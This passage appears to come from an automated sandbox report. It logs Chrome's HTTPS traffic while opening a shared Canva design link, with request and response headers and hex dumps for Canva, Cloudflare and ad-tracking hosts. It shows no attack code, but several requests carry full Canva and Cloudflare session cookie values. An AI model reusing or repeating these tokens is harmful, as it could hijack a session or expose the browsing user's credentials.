                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC1063INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:53 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951625c63436e-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                                    x-request-id: 8e5951625c63436e
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KE4XjtlODsBKf2wRof48aWC%2BBmd5bDZJyYeMsGkPRY%2BiO8BBztLS5IE1QtRpZzF24jP7CiWJ1YUkRoaBeJVQSFUFoDhw8Nf3KQzpA98huppjICKok3PF4dPY%2FxorI80%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC164INData Raw: 39 65 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 41 22 3a 22 72 47 71 65 72 44 38 73 58 31 72 43 4f 4d 6f 6b 61 30 5f 6e 5a 79 77 42 39 53 39 79 32 5f 79 35 63 34 50 47 51 39 65 4c 45 65 35 73 6e 64 39 51 53 5a 50 69 4f 56 66 51 44 69 63 55 55 63 70 78 73 71 38 52 67 46 75 75 36 36 7a 30 6b 57 50 44 74 4e 78 2d 34 39 6b 78 70 6c 46 47 52 78 49 51 4e 49 6e 59 51 51 6a 5f 6f 34 37 6d 73 64 79 34 22 2c 22 42 22 3a 31 37 33 32 31 32 32 31 31 33 38 34 32 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 9e'"])}while(1);</x>//{"A":"rGqerD8sX1rCOMoka0_nZywB9S9y2_y5c4PGQ9eLEe5snd9QSZPiOVfQDicUUcpxsq8RgFuu66z0kWPDtNx-49kxplFGRxIQNInYQQj_o47msdy4","B":1732122113842}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    122192.168.2.124985518.161.111.33443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:53 UTC528OUTGET /site-insights.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: cdn.metadata.io
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC765INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                    Content-Length: 6785
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 19 Jun 2024 15:02:09 GMT
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: GL5Tx2BZR8maW_iFgMB1W5mptWqV16dc
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 08:21:03 GMT
                                                                                                                                                                                                                                                                    ETag: "9c747cf07b2623fe6f77e47f5a134103"
                                                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                    Via: 1.1 e4564c21c6bc965b4eea8b7dc0f37cb4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: MRS52-P4
                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: MaHMbKHsXkj-R2wRgd_TX96DHgdnLWJQW_agnsAZbjBPR-aWdo9ClA==
                                                                                                                                                                                                                                                                    Age: 24051
                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC6785INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74 72 69 6e 67 7d 20 4b 65 79 20 66 6f 72 20 74 68 65 20 76 69 73 69 74 6f 72 20 49 44 20 63 6f 6f 6b 69 65 2e 0a 20 20 20 2a 2f 0a 20 20 63 6f 6e 73 74 20 76 69 73 69 74 6f 72 49 64 4b 65 79 20 3d 20 22 4d 65 74 61 64 61 74 61 5f 76 69 73 69 74 6f 72 5f 69 64 22 3b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74 72 69 6e 67 7d 20 4b 65 79 20 66 6f 72 20 74 68 65 20 73 65 73 73 69 6f 6e 20 49 44 20 63 6f 6f 6b 69 65 2e 0a 20 20 20 2a 2f 0a 20 20 63 6f 6e 73 74 20 73 65 73 73 69 6f 6e 49 64 4b 65 79 20 3d 20 22 4d 65 74 61 64 61 74 61 5f 73 65 73 73 69 6f 6e 5f 69 64 22 3b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74
                                                                                                                                                                                                                                                                    Data Ascii: (function () { /** * @type {string} Key for the visitor ID cookie. */ const visitorIdKey = "Metadata_visitor_id"; /** * @type {string} Key for the session ID cookie. */ const sessionIdKey = "Metadata_session_id"; /** * @type {st


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    123192.168.2.124985354.171.122.26443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:53 UTC623OUTGET /spp.pl?a=10000&.yp=10137834&gtmcb=1918978199 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: sp.analytics.yahoo.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC948INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:53 GMT
                                                                                                                                                                                                                                                                    Expires: Wed, 20 Nov 2024 15:01:53 GMT
                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, private, must-revalidate
                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                                    Server: ATS/9.1.10.144
                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Via: http/1.1 traffic_server (ApacheTrafficServer/9.1.10.144)
                                                                                                                                                                                                                                                                    Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    Content-Security-Policy: sandbox; default-src 'self'; script-src 'none'; object-src 'none'; report-uri http://csp.yahoo.com/beacon/csp?src=generic
                                                                                                                                                                                                                                                                    Set-Cookie: A3=d=AQABBOH5PWcCENgT-oowxfORKcicBnQezVEFEgEBAQFLP2dHZ9xS0iMA_eMAAA&S=AQAAAm5IQOCq3-jGxsQ7TpQZtUQ; Expires=Thu, 20 Nov 2025 21:01:53 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff ff ff ff 21 f9 04 04 14 00 ff 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    124192.168.2.1249858104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:53 UTC615OUTGET /web/ec8d2419e931aebd.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC1222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:54 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 411
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951646f93c332-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1572082
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "c0b2a76c1e93f5e6f8456bb938d2d403"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:40 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 30 Oct 2024 03:11:30 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 31 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: t4t2ujnBj3IKXvL4IhkijJEZhFOWYVHFppdmQGcd8WjqPZJ/QO3eiCHHkCpFJldwLpJSg5ecOaa1v6CBlb5R8S8li+o/OLco5mH7Wc+1oEc=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 4AV0EXZAAZAZ4ST0
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: chdQbFcdc5krOHeQLPzxUbMY3CJ4I85P
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC362INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 64 62 46 78 74 4a 74 48 73 5a 42 36 52 6c 34 35 59 38 38 59 25 32 46 59 25 32 42 41 6b 66 4a 67 25 32 42 6c 61 45 25 32 46 61 59 30 6d 75 6c 4e 41 72 25 32 42 41 6d 42 63 75 59 49 66 74 70 64 33 6d 4f 4b 69 53 53 4b 63 48 6a 6c 6c 41 39 67 7a 50 25 32 46 25 32 42 6f 70 65 30 25 32 46 62 31 39 4b 52 6f 35 65 46 71 59 41 6f 75 74 55 53 68 77 43 25 32 42 47 6d 49 56 56 69 6a 62 76 49 78 52 4f 4a 46 69 72 4b 51 32 32 75 32 38 54 64 52 6c 57 4c 30 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbFxtJtHsZB6Rl45Y88Y%2FY%2BAkfJg%2BlaE%2FaY0mulNAr%2BAmBcuYIftpd3mOKiSSKcHjllA9gzP%2F%2Bope0%2Fb19KRo5eFqYAoutUShwC%2BGmIVVijbvIxROJFirKQ22u28TdRlWL0%3D"}],"group":"cf-nel","max
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC411INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 34 31 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 34 30 32 32 34 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[2141],{/***/ 240224:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._4


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    125192.168.2.124985218.165.220.106443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:53 UTC708OUTGET /p?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=2124162551 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC756INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:54 GMT
                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                    Location: /p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=2124162551
                                                                                                                                                                                                                                                                    set-cookie: UID=18F9c60199021e57f0570b91732114914; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                    set-cookie: XID=18F9c60199021e57f0570b91732114914; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                    Via: 1.1 53a0f975e2490ceb7823ef71fea7315a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: 3Hwl5T81xQpIG6S6LLvhbWUulWLlGE_jmlrl8LrVwjbj-Baeu3v-hg==


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    126192.168.2.124985999.83.205.94443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC691OUTGET /i?aid=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&e=pv&p=web&tv=1x1&url=www.canva.com&refr=&uid=undefined&gtmcb=2000780129 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: p.tvpixel.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:54 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                    Set-Cookie: sp=0cccb407-2490-4125-ac5b-a35d21badbaa; Expires=Thu, 20 Nov 2025 15:01:54 GMT; Domain=tvpixel.com; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                    2024-11-20 15:01:54 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 ff ff ff 00 00 00 21 f9 04 05 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    127192.168.2.1249863104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC1487OUTGET /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_cam [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:55 UTC1075INHTTP/1.1 404 Not Found
